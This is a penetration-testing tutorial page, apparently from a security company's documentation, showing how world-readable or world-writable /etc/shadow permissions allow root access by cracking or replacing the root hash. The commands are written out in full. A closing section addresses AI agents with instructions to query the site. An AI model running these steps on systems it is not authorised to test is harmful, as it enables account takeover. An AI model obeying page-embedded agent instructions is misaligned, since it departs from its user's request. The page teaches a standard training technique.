# Weak File Permission - /etc/shadow Readable and Writable The /etc/shadow file plays a critical role in system security as it contains user password hashes, which are essential for verifying user credentials during login. Due to its sensitive nature, the /etc/shadow file is typically configured to be readable only by the root user.

## **#Exploit Only Limited to /etc/shadow Readable** However, in our target machine, the /etc/shadow file misconfigured to be readable by all users in the system. ``` ls -la /etc/shadow #to view the permission of /etc/shadow ```

``` cat /etc/shadow #to view the shadow file ```

After obtaining the hash value of the root user using the ‘cat’ command, we need to copy that hash and paste it into a new file. I named this file ‘hash.txt’ and then utilized the ‘John the Ripper’ (John) password cracking tool to crack the password and obtain the plaintext password. ``` john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt ```

After obtaining the plaintext password, we can use the ‘su’ (switch user) Linux command to switch to the root user. ``` su root #login with cracked password 'password123' whoami;id;pwd ```

## #Exploit Only Limited to /etc/shadow Writable We need to identify whether /etc/shadow is writable by all users by using the command ‘ls -la /etc/shadow’. ``` ls -la /etc/shadow ```

/etc/shadow writable permission for all the users.

If writable permissions are enabled for all users, we need to generate a new password hash value using the ‘mkpasswd’ utility with the SHA-512 algorithm, as Linux passwords are stored in /etc/shadow using SHA-512 encryption. ``` mkpasswd -m sha-512 sekkio123 ```

Next, we need to overwrite the custom-generated password hash value into the root user’s password field in \`/etc/shadow\`. ``` nano /etc/shadow ```

overwrite cutom-generated password in /etc/shadow file

Once overwrite the custom-generate password into the /etc/shadow file, we can use the ‘su’ (switch user) Linux command to switch to the root user. ``` su root #login with custom password 'sekkio123' whoami;id;pwd ```

#### About Seckio Seckio is a cybersecurity and technology company that builds security-first platforms and products while also providing expert offensive security services. Seckio operates across multiple areas of cybersecurity, including Vulnerability Assessment and Penetration Testing (VAPT), offensive security assessments, and compliance for modern digital environments. **Follow us on our below official handles for future updates:** [LinkedIn](https://linkedin.com/company/seckiohq), [X (Formerly twitter)](https://x.com/seckiohq), [Insta](https://instagram.com/seckiohq), [GitHub](https://github.com/seckiohq), [Medium](https://seckio.medium.com), [GitBook](https://seckio.gitbook.io) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://seckio.gitbook.io/security/linux-privilege-escalation/weak-file-permission-etc-shadow-readable-and-writable.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.